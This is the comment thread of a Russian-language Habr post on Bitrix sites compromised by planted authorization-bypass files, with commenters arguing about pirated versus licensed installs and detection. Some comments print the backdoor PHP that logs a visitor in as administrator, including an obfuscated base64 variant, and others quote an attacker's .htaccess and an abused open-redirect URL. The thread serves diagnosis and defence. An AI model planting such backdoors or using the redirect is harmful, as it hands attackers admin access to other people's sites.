Как стать автором
Обновить

Комментарии 149

Самая, что ни на есть. Проблемы с битриксом появляются чаще, за 2 года уже третья как минимум. Не говоря уже о том, что многие забывают про такие базовые меры предосторожности, как restore.php в корне сайта. Но такие случаи интересны — бэкдор в битриксе встретишь не часто, и очень хорошо, что всех объединил общий фактор.

А вот грамотность обслуживания сайтов хромает — никто не задается вопросом проблем с обновлением от разработчиков, как на том же условном битриксе, так и на других cms типа wordpress/joomla и тп.

Я имею ввиду классика — скачанные с торрентов пиратские версии CMS, форумных движков итд, где через N месяцев обнаруживаются бэкдоры, зашитые авторами торрентов. К моменту когда торрент удаляется, в зависимости от навыков автора, у него тысячи скачиваний и сотни сайтов с владельцев которых можно вымогать деньги. Ну а потом бэкдор уходит в паблик


По моему этим в середине / конце 2000ых болели половина форумов на IPB, vBulletin, XenForo и другие фан сайты на платных движках где владельцы просто не могли себе позволить лицензию в сотни долларов.


Ну а сегодня просто желание сэкономить

Пиратская версия с подарочком — это классика жанра задолго до веба, ещё на bbs-ках водилось во времена ms dos. Ну или из этого века — на торрентах был пиратский iWork в немного расширенной поставке, никого же не удивляет, что при установке iWork макось спрашивает пароль для получения рутовых прав.

Вордпресс давно обновляется сам, это модно конечно отключить — но кто нажмет лишнюю кнопку.


Перед битриксом поставить нжинкс например и эти редиректы заредиректить на главную например

Редирект в данном случае это пижонство и удобство. Даже без него багоюзер получает админскую куку и в админку может зайти уже и руками.

Ну вот попрошу без грязи. Если в Битриксе обновления безопасности не устанавливаются автоматически без участия пользователя не значит что в других cms все так же плохо

Интересно, что никто не делал публичный анализ ядра битрикс. Возможно там этих бэкдоров ведрами черпай.

Так а backdoor где? Пока я вижу две проблемы
— вебмастера оставляющие такие файлы в корне продакшен серверов
— CMS которая отказалась от Frontcontoller подхода (дефакто стандарта в мире PHP) и дает злым дядям грузить и запускать что угодно из паблик директории
файл new.php с кодом:

<?
require($_SERVER["DOCUMENT_ROOT"] . "/bitrix/header.php");
global $USER;
$USER->Authorize(1);
LocalRedirect(“/bitrix/admin/”);


в стандартном дистрибутиве его нет, в проблемных он был в трех экземплярах раскинут по разным папкам (но у всех одинаково), что наводит на мысли о том, что используемый дистрибутив был скачан вместе с ними.

при этом взломанные сайты между собой никак не связаны, у них разные владельцы, разные разработчики, короче всё разное, кроме пары общих факторов.
НЛО прилетело и опубликовало эту надпись здесь

Проблема в том, что многие массово используют этот самый пиратский битрикс с возможной дырой. Не так много, как те, кто использует его легально — но я столкнулся не с 5 и даже не с 20 случаями взлома через эту дырку.


А так да, основная дырка тут не бэкдор, а желание сэкономить, как сказали выше.

Проблема в том что жадные заказчики нанимают тупых и ленивых исполнителей.
Заказчики жадные потому, что нанимаю за еду и бледнеют когда им озвучивают стоимость лицензии.
Исполнители тупые потому, что ленятся даже движек сами скачать и взломать, это несложно и есть руководство. И ленивые потому что в голову им приходит просто проверить файлы на строчку autorize(1). Это самая простая закладка в Битриксе.
И кстати как результат все наказаны. Исполнители получают за работу еду вместо денег. Заказчик взлом вместо рабочего сайта.
Причем сканер уязвимостей самого битрикса отлавливает такое. Но его ж блин надо иногда запускать!
А кто этим должен заниматься? Владелец сайта? Разработчик? Хостер? Датацентр?

Не отлавливает в большинстве случаев. Откуда ему знать, что Васин компонент, переопределяющий шаблон стандартного элемента каталога, содержит лишнюю строку с инклюдом шелла?


Поэтому и пришлось писать свой сканер.

проверьте ваши личные сообщения пожалуйста)

Цена вопросаинрает свою роль, есть заказчики с условной 1000р, хочешь делай, не хочешь не делай.

Так всё. Именно стоимость лицензии как признак платежеспособности клиента.

Заголовок действительно вышел кликбейтным, к битриксу в легальном виде данная проблема маловероятно имеет какое-либо отношение, поэтому чутка подправил
Очень неудачно подправили. Я зашел почитать про «хакеров», которые взломали Битрикс (а кавычки я воспринял так, что кто-то просто заюзал недокументированное что-то или малоизвестное, т.е. это не настоящий взлом), а оказалось что в крякнутый Битрикс всего лишь засунули бэкдор пираты. Писали бы тогда «Бэкдор в крякнутом/пиратском Битрикс», и было бы сразу понятно.
Уверен, что не один я неправильно понял ваш новый заголовок.
Не пиратский, а «давно не обновляемый» тоже содержит этот бэкдор. С обновлением связано много рисков, в статье писал.

Этих файлов там не было ни в какой версии битрикса. Либо их руками кто-то разместил (что мало вероятно, когда такие файлы имеются на кучи не связанных установок), либо скачана такая сборка (но как автор сказал, что все версии не были лицензионными)

Через бэкдор закачивается шелл и ещё куча всего, в том числе эти файлы.
Ещё десяток вспомогательных временных создаётся, потом обнуляется… там много разных процессов идёт.
Отловленные файлы я выложил архивом на Гитхаб туда же, куда и сканер (линк ниже был)
libramedia.ru/blog/1s-bitriks-avtorizacziya-bez-parolya

Знакомый код, да? Это код который вы могли скопипастить из первых 10 страниц гугла, по запросу: «Битрикс скрипт авторизации без смс и регистрации». Сейчас ситуация лучше и стали добавлять строчку
@unlink(__FILE__); 

Но раньше, никто не парился, и этот код

Почему у 3 разных заказчиков этот файл в одних и тех же местах? Хороший вопрос, но очень сомневаюсь что его положили туда злоумышленники, скорее всего встроили бы прямо в код ядра бекдор и бекдор бы поумнее заюзали.

А кто же его туда положил? :-) Положить файл похожий на настоящий просто автоматически, чем пытаться встроиться в код ядра. Тем более, если любое обновление его может перетереть.

Если проблема действительно в том, что кто-то распространяет пиратскую версию CMS с бэкдорами, то единая точка входа никак не поможет. Да и от забытого вебмастером отладочного скрипта тоже.
При реализации Front Contoller, все запросы идут в один файл, условно
index.php

Даже если строка запроса будет такой:
/test.php

Запрос придет в index.php и там обработается роутером приложения, так работает весь адекватный веб на php и большая часть топ5 фреймворков. У вебмастера просто не получится там что-то оставить на диске, так как напрямую файлы с диска не грузятся, и уж тем более не инетрпитируются.

А разрешать грузить что угодно на диске, это довольно рисковый подход
НЛО прилетело и опубликовало эту надпись здесь
Да, я об этом писал выше
CMS которая отказалась от Frontcontoller подхода (дефакто стандарта в мире PHP) и дает злым дядям грузить и запускать что угодно из паблик директории

В новой версии Битрикс он уже есть.

НЛО прилетело и опубликовало эту надпись здесь

Вышел в одной из последних. Надо в код лезть, с ходу точную версию не могу сказать. Я правда ещё бетами пользуюсь, поэтому могу ошибиться — в продакшене или ещё нет. По умолчанию используется urlrewrite, но можно переключится на почти нормальный роуминг. За основу был взят симфоневский. Разработчики о нем раскалывали то ли на прошлой конференции, то ли на позапрошлой.

НЛО прилетело и опубликовало эту надпись здесь

Ужа с ежом там скрестили, как всегда
https://youtu.be/1_xYUQzQHj8?t=1244


Как при этом партнёры будут переучивать нынешних разрабов, которые привыкли там index.php, тудам index.php и в продакшен — я слабо представляю

НЛО прилетело и опубликовало эту надпись здесь
Очень сомневаюсь, что там есть приток свежей квалифицированной крови.
Как минимум, на такие мысли наводит вал довольно печальных публикаций в стиле «Как круто работать с Битриксом/Битрикс FW»
НЛО прилетело и опубликовало эту надпись здесь

Плюс ещё проблема в том что контент менеджер может лёгким движением руки вставить любой код в подключаемую область и это никто не заметит. Я когда это увидел первый раз очень удивился.

Да это-то понятно. Но если есть возможность впихнуть бэкдор в дистрибутив, тот же самый код можно запихнуть в код любого подключаемого файла ядра CMS, где проанализировать параметры запроса и выполнить авторизацию.
Да, это было бы логичнее и в случае с битриксом, будь тут злой умысел (распространить взломанный битрикс с бекдорами), хакеры бы действовали элегантнее. Вероятно просто кто-то оставил эти файлы для своих нужд случайно, а потом возможно поделился на файлпомойке «крякнутым» битриксом с другими
Может и так. Но часто такие файлы попадают через взломанный FTP, через дырявый хостинг (у меня был случай заражения из-за недостаточной изоляции сайтов на шареде), через забытые отладочные инструменты, через дырявые формы, позволяющие залить любой файл в директорию доступную веб-серверу. Почти на любом сайте в логах можно увидеть такие запросы. И против этого единая точка входа действительно помогла бы, хотя бы частично.
Классический шаред хостинг предусматривает только изоляцию аккаунтов на сервере. Изоляцию сайтов предоставляют немногие, за что им респект, но отсутствие изоляции сайтов на уровне аккаунта само по себе дыркой не является. Если сайты взломали из-за одного дырявого сайта на аккаунте, то причем тут хостер? Виноват исключительно хозяин сайтов, тут без обид.

Вот если Вас поломали из-за соседа на сервере, то это дырявый хостинг.
Между аккаунтами, конечно

«Один IP» назвать можно?
Ну и вообще интересно было бы услышать подробности. В официальном (не спираченном) дистрибутиве new.php в указанных местах нет, но теоретически их можно было и получить из-за какой-то массово проэксплуатированной уязвимости. Реакции от 1С на «скандал» нет?

Выше я говорил об этом, что в оф редакции битрикса таких файлов нет, и не было в принципе. Айпи самый обычный digital ocean, не думаю что есть смысл его раскрывать — таких тысячи, да и многие ищут уязвимости через уязвимости. Как например взломанный вордпресс может сканить другие вордпресс сайты на предмет наличия уязвимостей

«Какой скандал? Где?» — 1С про это ничего не слышал))
Это примерно то же самое, как они не слышали про то, что Битрикс генерирует сам кучу лишнего html кода при оформлении страницы…
Та и не свойственно большим компаниям с российскими корнями что-то признавать. АВОСЬ само рассосется!

А какую реакцию вы ожидаете? Это все равно что ждать реакции официальной от ауди или теслы, что угнанный, сваренный в гараже из трех тотальных авто их автомобиль взорвался в дтп и там погибли люди. Понятно, но производитель то тут при чем?

В тексте посыл о пиратской причине «уязвимости» подается как предположение, а не как доказанное утверждение.
Соответственно, пусть небольшая, но существует вероятность того, что дело в чем-то другом. «Что-то другое» может быть только эксплуатацией уязвимости уже в официальном коде.
Например, недавно Битрикс стал просить обновиться до php 7.4 с более ранних версий. Допустим, народ обновился, но оставил некоторые небезопасные настройки, что могло быть причиной уязвимости.

Да, это предположение, но сделанное на основе наблюдений, что все взломанные порталы были пиратскими. Весьма веский довод. Было бы желание, можно было бы найти более весомые доказательства этому.
А предположение об уязвимости в коде ни на чем вообще не основано. Нет никаких предпосылок к этому вообще.

А зачем админку открывать для левых IP-адресов?
Тут все просто, обычно нанимают «низкоквалифицированных специалистов» для разработки, покупают «недорогой» хостинг… лишь бы подешевле… в итоге сайт дырявый, контроля за правами и авторизацией никакого нет, но как говорится скупой платит дважды и его это устраивает
НЛО прилетело и опубликовало эту надпись здесь
Указанные файлы вполне могли быть залиты в результате эксплуатации другой уязвимости, как заложенной пиратами, так и просто присутствующей в старой и не обновляющейся версии Битрикса. И для однозначного утверждения, что этот файл положили злые пираты, нужно было найти эти файлы в пиратском дистрибутиве. Ну а для поиска «уязвимостей» в исходном коде есть diff — никто не мешает сделать дифф на пиратский и оригинальный битрикс, благо «достать» оригинал несложно, он не зашифрован и не обфусцирован

Таки нет, так-как
1) во-первых, версии взломанных были разными, и не самыми древними
2) в некоторых версиях ядро битрикса (то, где проверяется лицензия) — закодировано (точно не помню, в каких и до каких)
3) ну и анализ диффом это весьма длительная задача для битрикса, учитывая его иерархию. Безусловно, можно быстро отсеить все что одинаковое и анализировать что отличается, но… зачем столько чести для взломанного битрикса? Будь это лицензионный, то да, можно провести более доскональное расследование. Хотя у битрикса нет репо, где можно найти любую версию, чтобы поиск был наиболее грамотным.


Но Ваше предположение выглядит корректно, возможно найденные файлы лишь часть проблемы.

ну и анализ диффом это весьма длительная задача для битрикса, учитывая его иерархию.


-r, --recursive
recursively compare any subdirectories found


Повторюсь — нет архива версий, чтобы сравнение было правильным. В битриксе с его кодом, я уверен, на каждую минорную версию приходится столько исправлений, от которых никакой анализ не поможет. Что говорить о мажорных. Пройдемся рекурсивно диффом, увидим не одну тысячу изменений из которых 999 — сделаны разработчиками.
Я человек, измученный git'ом… Я догадывался, что в мире bitrix всё сложно… Но что невозможно восстановить исходный код продукта по версии — это как-то совсем сложно.
Возможно внутри систем битрикса они юзают что-либо вроде git, но публичных репо точно нет. Либо я плохо искал
Я имел в виду, разве по версии битрикса невозможно найти архив с релизом? Или хранение собственных релизных версий производитель не практикует?
Сложно сказать, вроде бы при установке битрикса устанавливается актуальная версия и иных вроде как не предусмотрено соответственно и найти тот самый архив проблематично.
Пнятненько :(

Кроме ядра Битрикса есть ещё отдельные страницы — каждая тоже php файл и есть шаблоны и кастомное переопределение стандартных компонентов Битрикса — тоже с кучей php, перемешанного с html. )))

Потому что на удивление взломанный битрикс использует меньше людей, чем не взломанный

Как то очень странно. Знаю 2 способа взлома лицензии битрикса. 1ый через ежемесячное обновление хешей в бд, второй через изменение нескольких строк в хитро обусфицированном файле. Но ни один не подразумевает использование таких файлов или изменения прав доступа или еще чего то подобного.


Так что есть немалая вероятность что непосредственно для загрузки этих файлов использовалась какая то другая уязвимость, которую неплохо было найти.


А так пост выглядит как будто автор был рад свалить все на взломанный битрикс и не копать дальше.


Как вариант конечно что битрикс был скачан у пиратов с уже зашитым бекдором, но там совсем древние версии и раз люди не смогли сами сделать довольно простой взлом то ну как бы туда и дорога. Либо делать нормально самому либо платить за лицензию.

Могли скачать древнюю версию и обновиться до актуальной. Почему нет?

Да там не очень хитро, include.php, делов на 15 минут, когда замучился каждые 30 дней танцевать с бубном для локальной разработки на каждом проекте, то пришел к выводу что быстрее расшифровать и сделать "пиратку" для дева, так быстрее. Меня удивляет что в Битриксе видят процесс разработки только одним человеком и дают на лицензию только одну копию для дева, у них там вообще свои взгляды на жизнь, которые часто не стыкуются с реальностью.

Я примерно так же к этому пришел) Потом ещё узнал что в сети есть этот файлик в нормальном виде и там ещё проще все.

Согласен, бред полный. У меня сейчас новый сайт в разработке и нужно закрывать публичку чтобы не забанили, бред какой то.

Вот это «новость»! Оказывается, пиратский софт содержит бэкдор!

Столкнулись с подобным случаем примерно 1 неделю назад.
При этом у людей лицензия есть.(пока не вижу подтверждения про пиратский bitrix)
Работа бота очень странная, у нас, например, бот также перебирал имена и нашел файл с авторизацией, но при этом не сразу запустил /bitrix/admin/php_command_line.php.
Файл с авторизацией( если полагаться на дату, что не очень правильно) был создан более года назад:
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/header.php");                                                                                                                                                         
                                                                                                                                                                                                                   
use Bitrix\Main,                                                                                                                                                                                                   
    Bitrix\Main\Application,                                                                                                                                                                                       
    Bitrix\Main\Loader;                                                                                                                                                                                            
    ?>                                                                                                                                                                                                             
                                                                                                                                                                                                                   
<?                                                                                                                                                                                                                 
$USER->Authorize(1);                                                                                                                                                                                               
?>                                                                                                                                                                                                                 
                                                                                                                                                                                                                   
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/footer.php");?>                                                                                                                                                       

Далее через сутки этот же бот почему-то проходит все файлы снова.
На глаза попался адрес 3l.l72.225.2ox, уже неделю ходит на сайт зараженный и перебирает файлы.
Скорее всего несколько личностей ломают сайт(ы), так как есть фиксация в логах другого поведения по «бекдорам».(например, настырное изменение htaccess)
<FilesMatch ".(phtml|php|PhP|php5|suspected)$">
Order Allow,Deny
Deny from all

<FilesMatch "(index).php$">
Order Allow,Deny
Allow from all

<FilesMatch "(wp-load).php$">
Order Allow,Deny
Allow from all

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ — [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule. index.php [L]

Интересно, а название файла какое было?

Название файла было /test.php. (возможно это разработчики оставили)
Также наблюдается сканирования с 79.l35.82.lx (вот с этим адресом можно уже проводить мероприятия. Вредитель за ним или зараженный, вот вопрос?)сегодня на 2-х разных сайтах(такой же перебор файлов).

test.php тоже перебирается

image

вероятно бот просто по паттернам перебирает всё что может перебрать, а new.php был остановлен задолго до него кем-то. О чем я и предположил, что они не связаны между собой (скорее всего).
Ага скрипт перебирает по списку файлов в /, /bitrix и /bitrix/admin.
А в ваших многих случаях какие решения(шаблоны) на сайтах используются? Они разные или одного производителя?
Может эти файлы делали сами владельцы сайтов по гайдам «как восстановить админский пароль от битрикис»
Разные владельцы и три файла в bitrix — сомнительное совпадение
Товарищи, там не один этот бот. Его кусок работает с Amazon AWS, и ищет он, как я понял, в том числе старые закладки.
НЛО прилетело и опубликовало эту надпись здесь
я столкнулся с такой же проблемой и битрикс при этом лицензионный
Может немного не в тему, но разве не нужно анализировать лог демонов и блокировать плохишей на уровне IP? Сделал IP 5 «нехороших» запросов — в бан-лист.
Грань между нормальным запросом и «нехорошим» сложно найти.
Если ты не разрабатываешь сайт и не сопровождаешь его всегда.(это же не SQL inject были)
Разве статус возврата демона «404» не явный показатель «нехорошести»?
Не хочу полемику разводить. Но ответ 404 не значит, что это «нехорошо».
Конечно можно сделать белый список для серверов bitrix, но эти самые сервера сканируют сайты на наличие файлов, которые считают не нужными на рабочем сайте. Например, restore.php (типичный сканер безопасности bitrix).

Ну поменяете вы на сайте часть разделов. Или удалите часть каталога. И у вас пачками в бан улетят поисковые роботы.

Будет слишком много ложнопозитивных банов
на shared-хостинге?

Как Битриксоид с большим стажем, скажу что часто этим и сами программисты грешат, кладут такой бэкдор. Чаще всего фрилансеры такое делают.

Да, те, кто начинает без предоплаты или для того, чтобы дождаться оплату по проекту могут положить, а могут потом и забыть.

О, так моя статья и «антивирус» — как раз про этот бэкдор. Знакомые файлы!

Берите скрипт-сканер, пользуйтесь:
habr.com/ru/post/543906

Скрин для примера
image



P.S. Паттерн Authorize(\d) я туда добавил, с большим весом, спасибо ))
спасибо большое, добавлю. Сейчас посмотрю, где вообще используется Authorize

UPD: мда, там куча конструкций вида $oAuthManager->Authorize($_REQUEST["auth_service_id"])… надо разобраться, как это работает и насколько уязвимо.
Так в php есть 100500 способов сформировать !0 или true. И еще больше способов закодировать Authorize.
Серьёзный антивирус должен был бы работать по-другому, это и сомнений не вызывает. Но эти вирусы тоже пишутся на коленке, поэтому есть шанс ловить их простыми regexp-ами, что я и сделал.

С Authorize я надеялся, что он вызывается достаточно редко вообще, но увы. Придётся ловить по \$USER->Authorize\([^\$], и дальше как обычно разбираться руками, что там за фигня творится.

Битрикс так написан, что код его исходников иногда сложно отличить от кода вируса.
Бэкдор может не иметь отношения ни к отсутствию обновлений, ни к «вечному демо». Обычно такой мусор появляется на сайте после подбора пароля к ftp.
Хотя да, в данном случае кто-то залил бэкдор, заточенный под битрикс почему-то.
Обычно даты создания таких файлов не соответствуют реальному времени создания.
И обычно файл сперва заливается, «настаивается», и только спустя время эксплуатируется.

Так что заголовок действительно кликбейт. Так же можно написать «под угрозой миллионы сайтов с php» или «под угрозой миллионы сайтов с ftp».

Скорее всего проблема не в пиратской версии, а в уязвимости движка.


Только на днях было несколько случаев:
файлы с таким же именами;
отредактированный .htaccess;
скриншот обфусцированного кода из index.php.


Все были на лицензии (но без обновлений разное время), располагались как на хостинге, так и на vps.

Это очень интересно, потому что в моей выборке все были без лицензии. А если кто-то сталкивается с этой проблемой НА лицензии, то тут реально надо анализировать глубже, как писали люди выше.

все что на скриншоте — следствие угнанной админки сайта (admin admin или подобное) и возможности загрузить файл через эту админку


"бэкдор" этот кроссплатформенный и чаще всего заражает modx

НЛО прилетело и опубликовало эту надпись здесь
Не соглашусь, дело не в «пиратском взломанном» ядре. На днях случилось тоже самое с абсолютно лицензионным сайтом, лицензию которой стабильно продлевают, но подозреваю, что проблема как раз-таки была в формах обратной связи, формы подписки, которые не были защищены от банальных SQL инъекций.
Почистили через модуль сканер и исправили все ошибки выявленные при проверке сканером безопасности. На данный момент всё в порядке и больше новых файлов не создавалось, но будем наблюдать…
Если это действительно так, то дело куда печальнее, на самом деле. А какие версии битрикса и этих модулей были у сайтов, которые взломали?
Не самый старый, но и не новый — БУС 20.0.0
В стандартных компонентах обратной связи и подписки никаких SQL инъекций нет. Скорее всего, самопал какой-то был.

Странное категоричное заявление "полюбому пиратский битрикс".
Почему не "в дырявый битрикс залили шелл" ?


ЗЫ. Наверное надежда что 1С вас заметят? )))
ЗЫЫ. Вы избавились от последствий, а не от причины

Потому что сам по себе битрикс достаточно защищён. Как-правило, ошибка в чьих-то кривых ручонках на месте, типа 20 сайтов на одной учётке шаред-хостинга.
> Потому что сам по себе битрикс достаточно защищён.
Т.е. вы можете это доказать? )
Ну вообще у битрикса есть версии с сертификатами ФСБ и ФСТЭК. Там именно что да, надо математически доказать. Правда, после этого код замораживается, любые изменения и апдейты требуют повторной сертификации.
Я не могу утверждать что битрикс дырявый. По роду деятельности я могу быть уверенным, что уязвимости может иметь любой софт, другой вопрос, как быстро их заметят. Вордпресс взламывают, потому что он массовый и всем интересно аудитить плагины с миллионами установок. Битрикс интересен 3.5 анонимусам, и иногда что-нибудь с ним всплывает.

Но на моей памяти фактов взлома регулярно обновляемого битрикса с легально купленной лицензией не было. Поэтому склонен полагать так, но при этом не являюсь ни разработчиком битрикса, ни тем, кто хотел бы быть замеченным этой компанией.
> Битрикс интересен 3.5 анонимусам, и иногда что-нибудь с ним всплывает.

Ошибка выжившего. Сканерам уязвимости пофиг битрикс у тебя или какой нибудь экзочиский xoop. Что загружено то и сканит )
Я рад что данная информация была полезной!
Раньше был популярен aibolit для поиска бэкдоров.

Что сейчас используют из opensource решений?
Айболит всё, они ушли под крыло cloudlinux, а точнее их отдела imunify (revisium продался, так сказать)
Очень жаль. Весьма мощное было решение.
НЛО прилетело и опубликовало эту надпись здесь
А какой из текущих инструментов по вашему действительно мощный?
Периодически появляется надобность, но нет времени искать и выбирать. Буду признателен за совет.
НЛО прилетело и опубликовало эту надпись здесь
Народ, у меня сегодня случилось тоже самое на лицензионном битриксе. Прям ровно тоже что и на скрине. Битрикс 20 версии. Сейчас тоже анализируем логи, но похоже что всё-таки на бекдор.
20 версия версии рознь. Надо видеть полную версию, там очень много зависит от минорных

Битрикс тут не причём, конечно, если он лицензионный, и с ним работал сертифицированный программист.
Смотри соседние сайты, скрипты, в которых описана загрузка файлов и особенно старые сайты или сайты с самописными cms

Сайты с самописными CMS взлому подвержены минимально, только если там совсем очевидных дыр. Говорю как разработчик сайтов на таких решениях.
НЛО прилетело и опубликовало эту надпись здесь
Искать дыры в самописном — надо напрягаться. А в известных продуктах — скрипт запустил и вперед.
НЛО прилетело и опубликовало эту надпись здесь
Я за всех и не говорю)
НЛО прилетело и опубликовало эту надпись здесь
НЛО прилетело и опубликовало эту надпись здесь
НЛО прилетело и опубликовало эту надпись здесь
Как-то сталкивался с подобным, но там не по Authorize(1) было а вот так Authorize(true)

Сам код был в таком виде:
<? $a =$_SERVER["DOCUMENT_ROOT"]; $b =$a.base64_decode ("L2JpdHJpeC9tb2R1bGVzL21haW4vaW5jbHVkZS8="); require($b.base64_decode("cHJvbG9nX2JlZm9yZS5waHA="));
$c = strrev("tuA").substr(strrev("ParBzirohMSlow"),5,round(0.00587544*851,0))."e"; global $USER; $USER->$c(true);require($b.base64_decode("ZXBpbG9nX2FmdGVyLnBocA=="));?>
<?require($a.base64_decode ("L2JpdHJpeC9mb290ZXIucGhw"));?>


После декодировки:
require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");
global $USER; $USER->Authorize(true);
require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/epilog_after.php");
require($_SERVER["DOCUMENT_ROOT"]."/bitrix/footer.php");
Сегодня столкнулся с этой же проблемой, взломали сайт на битриксе.
в корне находятся такие же файлы. подскажите как «вылечить» сайт и недопустить подобного в будущем.

битрикс был лицензионным
НЛО прилетело и опубликовало эту надпись здесь
только на сколько это спасет «отца русской» демократии, когда заражение было через дыру в битриксе, а разработчики не считают нужным делиться хотя бы критическими обновлениями со своими старыми клиентами…
НЛО прилетело и опубликовало эту надпись здесь
я бы с удовольствием продлил, но сайт сейчас не приносит денег вообще, и материальное положение не позволяет отдать 10к за годовой абонемент (

если бы разбирался в рhp то и проблем думаю не возникло с закрытием уязвимостей (
В битриксе — возникло бы)
НЛО прилетело и опубликовало эту надпись здесь

Мой сканер видели?


habr.com/ru/post/543906
github.com/mSnus/simple-virus-scanner

видел, но сделать ничего не удается. (((
можем через личку пообщаться?

Конечно, пишите, помогу

стукнулся
НЛО прилетело и опубликовало эту надпись здесь
Получается, что скупой платит дважды…
НЛО прилетело и опубликовало эту надпись здесь
Подскажите, что делать вот с этим:
********.gov.ru/bitrix/redirect.php?event1=&event2=&event3=&goto=https://www.bluevalentine-restaurant.com/
в выдаче гугла.
Не лезть не в своё дело?
Откройте файл /bitrix/redirect.php и после <?php вставьте код:

$gotoParseURL = parse_url($_REQUEST['goto']);
if( $gotoParseURL['host'] != $_SERVER['SERVER_NAME'] ){
die('Hacking attemp');
}


если у Вас конечно есть доступ к этому)
Нету, я просто нагуглил это. Искал я, конечно, совсем другое.

Напишите в Роскомнадзор. Серьёзно.

Боюсь, что они либо гугл забанят, либо меня.
На днях как раз закончился месяц как Росреестр мне ответил, что всё проверят и передадут разработчикам. Вероятно, никто не видит в этом проблемы.

Ответ на второе обращение
image
Зарегистрируйтесь на Хабре, чтобы оставить комментарий

Публикации

Истории